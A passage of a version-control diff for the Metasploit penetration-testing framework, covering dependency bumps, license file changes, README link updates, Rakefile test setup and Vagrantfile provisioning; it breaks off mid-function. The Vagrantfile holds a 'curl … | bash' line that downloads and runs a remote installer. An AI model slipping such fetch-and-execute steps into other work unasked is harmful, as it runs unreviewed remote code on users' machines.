-      rack (>= 1.0.0)
-      rack-test (>= 0.5.4)
-      xpath (~> 2.0)
-    childprocess (0.5.9)
-      ffi (~> 1.0, >= 1.0.11)
-    coderay (1.1.1)
-    contracts (0.14.0)
-    cucumber (2.4.0)
-      builder (>= 2.1.2)
-      cucumber-core (~> 1.5.0)
-      cucumber-wire (~> 0.0.1)
-      diff-lcs (>= 1.1.3)
-      gherkin (~> 4.0)
-      multi_json (>= 1.7.5, < 2.0)
-      multi_test (>= 0.1.2)
-    cucumber-core (1.5.0)
-      gherkin (~> 4.0)
-    cucumber-rails (1.4.5)
-      capybara (>= 1.1.2, < 3)
-      cucumber (>= 1.3.8, < 4)
-      mime-types (>= 1.16, < 4)
-      nokogiri (~> 1.5)
-      railties (>= 3, < 5.1)
-    cucumber-wire (0.0.1)
+    coderay (1.1.2)
+    concurrent-ruby (1.0.5)
+    crass (1.0.4)
    diff-lcs (1.3)
-    docile (1.1.5)
+    dnsruby (1.61.3)
+      addressable (~> 2.5)
+    docile (1.3.2)
+    ed25519 (1.2.4)
    erubis (2.7.0)
-    factory_girl (4.8.0)
+    factory_girl (4.9.0)
      activesupport (>= 3.0.0)
-    factory_girl_rails (4.8.0)
-      factory_girl (~> 4.8.0)
+    factory_girl_rails (4.9.0)
+      factory_girl (~> 4.9.0)
      railties (>= 3.0.0)
-    faraday (0.11.0)
+    faker (2.1.2)
+      i18n (>= 0.8)
+    faraday (0.15.4)
      multipart-post (>= 1.2, < 3)
-    ffi (1.9.17)
-    filesize (0.1.1)
-    fivemat (1.3.2)
-    gherkin (4.0.0)
-    i18n (0.8.0)
+    filesize (0.2.0)
+    fivemat (1.3.7)
+    hashery (2.1.2)
+    i18n (0.9.5)
+      concurrent-ruby (~> 1.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.0.3)
-    loofah (2.0.3)
+    json (2.2.0)
+    loofah (2.2.3)
+      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
-    metasm (1.0.2)
-    metasploit-concern (2.0.3)
+    metasm (1.0.4)
+    metasploit-concern (2.0.5)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (2.0.8)
+    metasploit-credential (2.0.14)
      metasploit-concern
      metasploit-model
-      metasploit_data_models
+      metasploit_data_models (< 3.0.0)
      pg
      railties
+      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (2.0.3)
+    metasploit-model (2.0.4)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.2.14)
-    metasploit_data_models (2.0.14)
+    metasploit-payloads (1.3.70)
+    metasploit_data_models (2.0.17)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
@@ -179,171 +171,184 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.1.7)
-    method_source (0.8.2)
-    mime-types (3.1)
-      mime-types-data (~> 3.2015)
-    mime-types-data (3.2016.0521)
-    mini_portile2 (2.1.0)
-    minitest (5.10.1)
-    msgpack (1.0.3)
-    multi_json (1.12.1)
-    multi_test (0.1.2)
-    multipart-post (2.0.0)
+    metasploit_payloads-mettle (0.5.16)
+    method_source (0.9.2)
+    mini_portile2 (2.4.0)
+    minitest (5.11.3)
+    mqtt (0.5.0)
+    msgpack (1.3.1)
+    multipart-post (2.1.1)
    nessus_rest (0.1.6)
-    net-ssh (4.1.0)
-    network_interface (0.0.1)
-    nokogiri (1.7.0.1)
-      mini_portile2 (~> 2.1.0)
-    octokit (4.6.2)
+    net-ssh (5.2.0)
+    network_interface (0.0.2)
+    nexpose (7.2.1)
+    nokogiri (1.10.4)
+      mini_portile2 (~> 2.4.0)
+    octokit (4.14.0)
      sawyer (~> 0.8.0, >= 0.5.3)
-    openssl-ccm (1.2.1)
+    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
-    packetfu (1.1.13.pre)
+    packetfu (1.1.13)
      pcaprub
    patch_finder (1.0.2)
-    pcaprub (0.12.4)
-    pg (0.19.0)
+    pcaprub (0.13.0)
+    pdf-reader (2.2.1)
+      Ascii85 (~> 1.0.0)
+      afm (~> 0.2.1)
+      hashery (~> 2.0)
+      ruby-rc4
+      ttfunk
+    pg (0.21.0)
    pg_array_parser (0.0.9)
-    postgres_ext (3.0.0)
-      activerecord (>= 4.0.0)
+    postgres_ext (3.0.1)
+      activerecord (~> 4.0)
      arel (>= 4.0.1)
      pg_array_parser (~> 0.0.9)
-    pry (0.10.4)
+    pry (0.12.2)
      coderay (~> 1.1.0)
-      method_source (~> 0.8.1)
-      slop (~> 3.4)
-    public_suffix (2.0.5)
-    rack (1.6.5)
+      method_source (~> 0.9.0)
+    public_suffix (3.1.1)
+    rack (1.6.11)
    rack-test (0.6.3)
      rack (>= 1.0)
    rails-deprecated_sanitizer (1.0.3)
      activesupport (>= 4.2.0.alpha)
-    rails-dom-testing (1.0.8)
-      activesupport (>= 4.2.0.beta, < 5.0)
+    rails-dom-testing (1.0.9)
+      activesupport (>= 4.2.0, < 5.0)
      nokogiri (~> 1.6)
      rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.0.3)
-      loofah (~> 2.0)
-    railties (4.2.8)
-      actionpack (= 4.2.8)
-      activesupport (= 4.2.8)
+    rails-html-sanitizer (1.2.0)
+      loofah (~> 2.2, >= 2.2.2)
+    railties (4.2.11.1)
+      actionpack (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (12.0.0)
-    rb-readline (0.5.4)
-    recog (2.1.4)
+    rake (12.3.3)
+    rb-readline (0.5.5)
+    recog (2.3.2)
      nokogiri
-    redcarpet (3.4.0)
-    rex-arch (0.1.4)
+    redcarpet (3.5.0)
+    rex-arch (0.1.13)
      rex-text
-    rex-bin_tools (0.1.1)
+    rex-bin_tools (0.1.6)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.7)
-    rex-encoder (0.1.2)
+    rex-core (0.1.13)
+    rex-encoder (0.1.4)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.11)
+    rex-exploitation (0.1.21)
      jsobfu
      metasm
      rex-arch
      rex-encoder
      rex-text
-    rex-java (0.1.3)
-    rex-mime (0.1.3)
+    rex-java (0.1.5)
+    rex-mime (0.1.5)
      rex-text
-    rex-nop (0.1.0)
+    rex-nop (0.1.1)
      rex-arch
-    rex-ole (0.1.4)
+    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.69)
+    rex-powershell (0.1.82)
      rex-random_identifier
      rex-text
-    rex-random_identifier (0.1.1)
+    rex-random_identifier (0.1.4)
      rex-text
-    rex-registry (0.1.1)
-    rex-rop_builder (0.1.1)
+    rex-registry (0.1.3)
+    rex-rop_builder (0.1.3)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.3)
+    rex-socket (0.1.17)
+      rex-core
+    rex-sslscan (0.1.5)
      rex-core
-    rex-sslscan (0.1.2)
      rex-socket
      rex-text
-    rex-struct2 (0.1.0)
-    rex-text (0.2.11)
-    rex-zip (0.1.1)
+    rex-struct2 (0.1.2)
+    rex-text (0.2.22)
+    rex-zip (0.1.3)
      rex-text
    rkelly-remix (0.0.7)
-    robots (0.10.1)
-    rspec-core (3.5.4)
-      rspec-support (~> 3.5.0)
-    rspec-expectations (3.5.0)
+    rspec (3.8.0)
+      rspec-core (~> 3.8.0)
+      rspec-expectations (~> 3.8.0)
+      rspec-mocks (~> 3.8.0)
+    rspec-core (3.8.2)
+      rspec-support (~> 3.8.0)
+    rspec-expectations (3.8.4)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.5.0)
-    rspec-mocks (3.5.0)
+      rspec-support (~> 3.8.0)
+    rspec-mocks (3.8.1)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.5.0)
-    rspec-rails (3.5.2)
+      rspec-support (~> 3.8.0)
+    rspec-rails (3.8.2)
      actionpack (>= 3.0)
      activesupport (>= 3.0)
      railties (>= 3.0)
-      rspec-core (~> 3.5.0)
-      rspec-expectations (~> 3.5.0)
-      rspec-mocks (~> 3.5.0)
-      rspec-support (~> 3.5.0)
-    rspec-support (3.5.0)
-    rubyntlm (0.6.1)
-    rubyzip (1.2.1)
-    sawyer (0.8.1)
-      addressable (>= 2.3.5, < 2.6)
-      faraday (~> 0.8, < 1.0)
-    shoulda-matchers (3.1.1)
-      activesupport (>= 4.0.0)
-    simplecov (0.13.0)
-      docile (~> 1.1.0)
+      rspec-core (~> 3.8.0)
+      rspec-expectations (~> 3.8.0)
+      rspec-mocks (~> 3.8.0)
+      rspec-support (~> 3.8.0)
+    rspec-rerun (1.1.0)
+      rspec (~> 3.0)
+    rspec-support (3.8.2)
+    ruby-macho (2.2.0)
+    ruby-rc4 (0.1.5)
+    ruby_smb (1.1.0)
+      bindata
+      rubyntlm
+      windows_error
+    rubyntlm (0.6.2)
+    rubyzip (1.2.3)
+    sawyer (0.8.2)
+      addressable (>= 2.3.5)
+      faraday (> 0.8, < 2.0)
+    simplecov (0.17.0)
+      docile (~> 1.1)
      json (>= 1.8, < 3)
      simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.0)
-    slop (3.6.0)
+    simplecov-html (0.10.2)
    sqlite3 (1.3.13)
-    sshkey (1.9.0)
-    thor (0.19.4)
-    thread_safe (0.3.5)
-    timecop (0.8.1)
-    tzinfo (1.2.2)
+    sshkey (2.0.0)
+    thor (0.20.3)
+    thread_safe (0.3.6)
+    timecop (0.9.1)
+    ttfunk (1.5.1)
+    tzinfo (1.2.5)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2016.10)
+    tzinfo-data (1.2019.2)
      tzinfo (>= 1.0.0)
-    windows_error (0.1.0)
-    xpath (2.0.0)
-      nokogiri (~> 1.3)
-    yard (0.9.8)
+    windows_error (0.1.2)
+    xdr (2.0.0)
+      activemodel (>= 4.2.7)
+      activesupport (>= 4.2.7)
+    xmlrpc (0.3.0)
+    yard (0.9.20)

 PLATFORMS
  ruby

 DEPENDENCIES
-  aruba
-  cucumber-rails
  factory_girl_rails
  fivemat
  metasploit-framework!
-  octokit (~> 4.0)
+  octokit
  pry
  rake
  redcarpet
  rspec-rails
-  shoulda-matchers
+  rspec-rerun
  simplecov
+  sqlite3 (~> 1.3.0)
  timecop
  yard

 BUNDLED WITH
-   1.14.4
+   1.17.3
@@ -1,38 +0,0 @@
-HACKING
-=======
-
-(Last updated: 2014-03-04)
-
-This document almost entirely deprecated by:
-
-CONTRIBUTING.md
-
-in the same directory as this file, and to a lesser extent:
-
-The Metasploit Development Environment
-https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
-
-Common Coding Mistakes
-https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
-
-The Ruby Style Guide
-https://github.com/bbatsov/ruby-style-guide
-
-Ruby 1.9: What to Expect
-http://slideshow.rubyforge.org/ruby19.html
-
-You can use the the "./tools/msftidy.rb" script against your new and
-changed modules to do some rudimentary checking for various style and
-syntax violations.
-
-Licensing for Your New Content
-==============================
-
-By submitting code contributions to the Metasploit Project it is
-assumed that you are offering your code under the Metasploit License
-or similar 3-clause BSD-compatible license.  MIT and Ruby Licenses
-are also fine.  We specifically cannot include GPL code. LGPL code
-is accepted on a case by case basis for libraries only and is never
-accepted for modules.
-
-
@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2017, Rapid7, Inc.
+Copyright: 2006-2018, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -15,21 +15,13 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #

-Files: data/templates/to_mem_pshreflection.ps1.template
-Copyright: 2012, Matthew Graeber
-License: BSD-3-clause
-
-Files: data/john/*
-Copyright: 1996-2011 Solar Designer.
-License: GPL-2
-
-Files: external/pcaprub/*
-Copyright: 2007-2008, Alastair Houghton
+Files: data/exploits/mysql/lib_mysqludf_sys_*.so
+Copyright: 2007  Roland Bouman
+           2008-2010  Roland Bouman and Bernardo Damele A. G.
 License: LGPL-2.1

-Files: external/ruby-kissfft/*
-Copyright: 2003-2010 Mark Borgerding
-           2009-2012 H D Moore <hdm[at]rapid7.com>
+Files: data/templates/to_mem_pshreflection.ps1.template
+Copyright: 2012, Matthew Graeber
 License: BSD-3-clause

 Files: external/source/exploits/IE11SandboxEscapes/*
@@ -79,38 +71,18 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

-Files: lib/bit-struct.rb lib/bit-struct/*
-Copyright: 2005-2009, Joel VanderWerf
-License: Ruby
-
-Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
-Copyright: 2006-2010 Yoann GUILLOT
-License: LGPL-2.1
-
-Files: lib/nessus/*
-Copyright: Vlatoko Kosturjak
-License: BSD-3-clause
+Files: lib/msf/core/modules/external/python/async_timeout/*
+Copyright: 2016-2017 Andrew Svetlov
+License: Apache 2.0

 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby

-Files: lib/net/ssh.rb lib/net/ssh/*
-Copyright: 2008 Jamis Buck <jamis@37signals.com>
-License: MIT
-
-Files: lib/packetfu.rb lib/packetfu/*
-Copyright: 2008-2012 Tod Beardsley
-License: BSD-3-clause
-
 Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
 Copyright: 2005 Michael Neumann
 License: BSD-3-clause or Ruby

-Files: lib/openvas/*
-Copyright: No copyright statement provided
-License: MIT
-
 Files: lib/rabal/*
 Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
 License: Ruby
@@ -119,22 +91,10 @@ Files: lib/rbmysql.rb lib/rbmysql/*
 Copyright: 2009 tommy
 License: Ruby

-Files: lib/rbreadline.rb
-Copyright: 2009 Park Heesob
-License: BSD-3-clause
-
-Files: lib/rkelly/*
-Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette
-License: MIT
-
 Files: lib/snmp.rb lib/snmp/*
 Copyright: 2004, David R. Halliday
 License: Ruby

-Files: lib/sshkey.rb lib/sshkey/*
-Copyright: 2011 James Miller
-License: MIT
-
 Files: lib/windows_console_color_support.rb
 Copyright: 2011 Michael 'mihi' Schierl
 License: BSD-3-clause
@@ -151,132 +111,6 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT

-
-#
-# Gems
-#
-
-Files: activemodel
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: activerecord
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: activesupport
-Copyright: 2005-2011 David Heinemeier Hansson
-License: MIT
-
-Files: arel
-Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
-License: MIT
-
-Files: bcrypt
-Copyright: 2007-2011 Coda Hale
-License: MIT
-
-Files: builder
-Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
-License: MIT
-
-Files: database_cleaner
-Copyright: 2009 Ben Mabey
-License: MIT
-
-Files: diff-lcs
-Copyright: 2004-2011 Austin Ziegler
-License: MIT
-
-Files: factory_girl
-Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
-License: MIT
-
-Files: fivemat
-Copyright: 2012 Tim Pope
-License: MIT
-
-Files: i18n
-Copyright: 2008 The Ruby I18n team
-License: MIT
-
-Files: json
-Copyright: Daniel Luz <dev at mernen dot com>
-License: Ruby
-
-Files: metasploit_data_models
-Copyright: 2012 Rapid7, Inc.
-License: MIT
-
-Files: mini_portile
-Copyright: 2011 Luis Lavena
-License: MIT
-
-Files: msgpack
-Copyright: Austin Ziegler
-License: Ruby
-
-Files: multi_json
-Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
-License: MIT
-
-Files: network_interface
-Copyright: 2012, Rapid7, Inc.
-License: MIT
-
-Files: nokogiri
-Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
-License: MIT
-
-Files: packetfu
-Copyright: 2008-2012 Tod Beardsley
-License: BSD-3-clause
-
-Files: pcaprub
-Copyright: 2007-2008, Alastair Houghton
-License: LGPL-2.1
-
-Files: pg
-Copyright: 1997-2012 by the authors
-License: Ruby
-
-Files: rake
-Copyright: 2003, 2004 Jim Weirich
-License: MIT
-
-Files: redcarpet
-Copyright: 2009 Natacha Porté
-License: MIT
-
-Files: robots
-Copyright: 2008 Kyle Maxwell, contributors
-License: MIT
-
-Files: rspec
-Copyright: 2009 Chad Humphries, David Chelimsky
-License: MIT
-
-Files: shoulda-matchers
-Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
-License: MIT
-
-Files: simplecov
-Copyright: 2010-2012 Christoph Olszowka
-License: MIT
-
-Files: timecop
-Copyright: 2012 Travis Jeffery, John Trupiano
-License: MIT
-
-Files: tzinfo
-Copyright: 2005-2006 Philip Ross
-License: MIT
-
-Files: yard
-Copyright: 2007-2013 Loren Segal
-License: MIT
-
-
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -765,6 +599,54 @@ License: Artistic
 DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF
 ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

+License: Apache
+ Version 1.1, 2000
+ Modifications by CORE Security Technologies
+ .
+ Copyright (c) 2000 The Apache Software Foundation.  All rights
+ reserved.
+ .
+ Redistribution and use in source and binary forms, with or without
+ modification, are permitted provided that the following conditions
+ are met:
+ .
+ 1. Redistributions of source code must retain the above copyright
+    notice, this list of conditions and the following disclaimer.
+ .
+ 2. Redistributions in binary form must reproduce the above copyright
+    notice, this list of conditions and the following disclaimer in
+    the documentation and/or other materials provided with the
+    distribution.
+ .
+ 3. The end-user documentation included with the redistribution,
+    if any, must include the following acknowledgment:
+       "This product includes software developed by
+        CORE Security Technologies (http://www.coresecurity.com/)."
+    Alternately, this acknowledgment may appear in the software itself,
+    if and wherever such third-party acknowledgments normally appear.
+ .
+ 4. The names "Impacket" and "CORE Security Technologies" must
+    not be used to endorse or promote products derived from this
+    software without prior written permission. For written
+    permission, please contact oss@coresecurity.com.
+ .
+ 5. Products derived from this software may not be called "Impacket",
+    nor may "Impacket" appear in their name, without prior written
+    permission of CORE Security Technologies.
+ .
+ THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
+ WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+ OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+ DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
+ ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+ LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
+ USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+ OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+ OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ SUCH DAMAGE.
+
 License: Apache
 Version 2.0, January 2004
 http://www.apache.org/licenses/
@@ -0,0 +1,124 @@
+This file is auto-generated by tools/dev/update_gem_licenses.sh
+Ascii85, 1.0.3, MIT
+actionpack, 4.2.11.1, MIT
+actionview, 4.2.11.1, MIT
+activemodel, 4.2.11.1, MIT
+activerecord, 4.2.11.1, MIT
+activesupport, 4.2.11.1, MIT
+addressable, 2.6.0, "Apache 2.0"
+afm, 0.2.2, MIT
+arel, 6.0.4, MIT
+arel-helpers, 2.10.0, MIT
+backports, 3.15.0, MIT
+bcrypt, 3.1.12, MIT
+bcrypt_pbkdf, 1.0.1, MIT
+bindata, 2.4.4, ruby
+bit-struct, 0.16, ruby
+builder, 3.2.3, MIT
+bundler, 1.17.3, MIT
+coderay, 1.1.2, MIT
+concurrent-ruby, 1.0.5, MIT
+crass, 1.0.4, MIT
+diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
+dnsruby, 1.61.3, "Apache 2.0"
+docile, 1.3.2, MIT
+ed25519, 1.2.4, MIT
+erubis, 2.7.0, MIT
+factory_girl, 4.9.0, MIT
+factory_girl_rails, 4.9.0, MIT
+faker, 2.1.2, MIT
+faraday, 0.15.4, MIT
+filesize, 0.2.0, MIT
+fivemat, 1.3.7, MIT
+hashery, 2.1.2, "Simplified BSD"
+i18n, 0.9.5, MIT
+jsobfu, 0.4.2, "New BSD"
+json, 2.2.0, ruby
+loofah, 2.2.3, MIT
+metasm, 1.0.4, LGPL-2.1
+metasploit-concern, 2.0.5, "New BSD"
+metasploit-credential, 2.0.14, "New BSD"
+metasploit-framework, 4.17.76, "New BSD"
+metasploit-model, 2.0.4, "New BSD"
+metasploit-payloads, 1.3.70, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 2.0.17, "New BSD"
+metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
+method_source, 0.9.2, MIT
+mini_portile2, 2.4.0, MIT
+minitest, 5.11.3, MIT
+mqtt, 0.5.0, MIT
+msgpack, 1.3.1, "Apache 2.0"
+multipart-post, 2.1.1, MIT
+nessus_rest, 0.1.6, MIT
+net-ssh, 5.2.0, MIT
+network_interface, 0.0.2, MIT
+nexpose, 7.2.1, "New BSD"
+nokogiri, 1.10.4, MIT
+octokit, 4.14.0, MIT
+openssl-ccm, 1.2.2, MIT
+openvas-omp, 0.0.4, MIT
+packetfu, 1.1.13, BSD
+patch_finder, 1.0.2, "New BSD"
+pcaprub, 0.13.0, LGPL-2.1
+pdf-reader, 2.2.1, MIT
+pg, 0.21.0, "New BSD"
+pg_array_parser, 0.0.9, unknown
+postgres_ext, 3.0.1, MIT
+pry, 0.12.2, MIT
+public_suffix, 3.1.1, MIT
+rack, 1.6.11, MIT
+rack-test, 0.6.3, MIT
+rails-deprecated_sanitizer, 1.0.3, MIT
+rails-dom-testing, 1.0.9, MIT
+rails-html-sanitizer, 1.2.0, MIT
+railties, 4.2.11.1, MIT
+rake, 12.3.3, MIT
+rb-readline, 0.5.5, BSD
+recog, 2.3.2, unknown
+redcarpet, 3.5.0, MIT
+rex-arch, 0.1.13, "New BSD"
+rex-bin_tools, 0.1.6, "New BSD"
+rex-core, 0.1.13, "New BSD"
+rex-encoder, 0.1.4, "New BSD"
+rex-exploitation, 0.1.21, "New BSD"
+rex-java, 0.1.5, "New BSD"
+rex-mime, 0.1.5, "New BSD"
+rex-nop, 0.1.1, "New BSD"
+rex-ole, 0.1.6, "New BSD"
+rex-powershell, 0.1.82, "New BSD"
+rex-random_identifier, 0.1.4, "New BSD"
+rex-registry, 0.1.3, "New BSD"
+rex-rop_builder, 0.1.3, "New BSD"
+rex-socket, 0.1.17, "New BSD"
+rex-sslscan, 0.1.5, "New BSD"
+rex-struct2, 0.1.2, "New BSD"
+rex-text, 0.2.22, "New BSD"
+rex-zip, 0.1.3, "New BSD"
+rkelly-remix, 0.0.7, MIT
+rspec, 3.8.0, MIT
+rspec-core, 3.8.2, MIT
+rspec-expectations, 3.8.4, MIT
+rspec-mocks, 3.8.1, MIT
+rspec-rails, 3.8.2, MIT
+rspec-rerun, 1.1.0, MIT
+rspec-support, 3.8.2, MIT
+ruby-macho, 2.2.0, MIT
+ruby-rc4, 0.1.5, MIT
+ruby_smb, 1.1.0, "New BSD"
+rubyntlm, 0.6.2, MIT
+rubyzip, 1.2.3, "Simplified BSD"
+sawyer, 0.8.2, MIT
+simplecov, 0.17.0, MIT
+simplecov-html, 0.10.2, MIT
+sqlite3, 1.3.13, "New BSD"
+sshkey, 2.0.0, MIT
+thor, 0.20.3, MIT
+thread_safe, 0.3.6, "Apache 2.0"
+timecop, 0.9.1, MIT
+ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.5, MIT
+tzinfo-data, 1.2019.2, MIT
+windows_error, 0.1.2, BSD
+xdr, 2.0.0, "Apache 2.0"
+xmlrpc, 0.3.0, ruby
+yard, 0.9.20, MIT
@@ -1,4 +1,4 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework)
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
 ==
 The Metasploit Framework is released under a BSD-style license. See
 COPYING for more details.
@@ -9,20 +9,19 @@ Bug tracking and development information can be found at:
 https://github.com/rapid7/metasploit-framework

 New bugs and feature requests should be directed to:
-  http://r-7.co/MSF-BUGv1
+  https://r-7.co/MSF-BUGv1

 API documentation for writing modules can be found at:
  https://rapid7.github.io/metasploit-framework/api

-Questions and suggestions can be sent to:
-  https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
+Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list

 Installing
 --

-Generally, you should use [the free installer](https://www.metasploit.com/download),
+Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
 which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](http://r-7.co/MSF-DEV) if
+few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
 you'd like to deal with dependencies on your own.

 Using Metasploit
@@ -45,6 +44,6 @@ pull request. For slightly more information, see
 [wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
 [wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
 [wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
-[unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"


@@ -9,6 +9,20 @@ require 'metasploit/framework/spec/untested_payloads'
 # the user installs with `bundle install --without db`
 Metasploit::Framework::Require.optionally_active_record_railtie

+begin
+  require 'rspec/core'
+  require 'rspec-rerun/tasks'
+rescue LoadError
+  puts "rspec not in bundle, so can't set up spec tasks.  " \
+       "To run specs ensure to install the development and test groups."
+  puts "Bundle currently installed '--without #{Bundler.settings.without.join(' ')}'."
+  puts "To clear the without option do `bundle install --without ''` (the --without flag with an empty string) or " \
+       "`rm -rf .bundle` to remove the .bundle/config manually and then `bundle install`"
+else
+  require 'rspec/core/rake_task'
+  RSpec::Core::RakeTask.new(spec: 'db:test:prepare')
+end
+
 Metasploit::Framework::Application.load_tasks
 Metasploit::Framework::Spec::Constants.define_task
 Metasploit::Framework::Spec::Threads::Suite.define_task
@@ -3,10 +3,7 @@

 Vagrant.configure(2) do |config|
  config.ssh.forward_x11 = true
-  config.vm.box = "ubuntu/trusty64"
-  # TODO: find a minimal image that keeps up-to-date and
-  # supports multiple providers
-  #config.vm.box = "phusion/ubuntu-14.04-amd64"
+  config.vm.box = "ubuntu/xenial64"
  config.vm.network :forwarded_port, guest: 4444, host: 4444
  config.vm.provider "vmware" do |v|
 	  v.memory = 2048
@@ -26,15 +23,14 @@ Vagrant.configure(2) do |config|
  [ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
    "apt-get update",
    "apt-get dist-upgrade -y",
-    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg fortune postgresql postgresql-contrib",
+    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
  ].each do |step|
    config.vm.provision "shell", inline: step
  end

  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
    "curl -L https://get.rvm.io | bash -s stable",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm --install .ruby-version",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
    "mkdir -p ~/.msf4",
  ].each do |step|
@@ -22,11 +22,26 @@ unless ENV['BUNDLE_GEMFILE']
  end
 end

+# Remove bigdecimal warning - start
+# https://github.com/ruby/bigdecimal/pull/115
+# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
+# TODO: remove when upgrading from rails 4.x
+require 'bigdecimal'
+
+def BigDecimal.new(*args, **kwargs)
+  return BigDecimal(*args) if kwargs.empty?
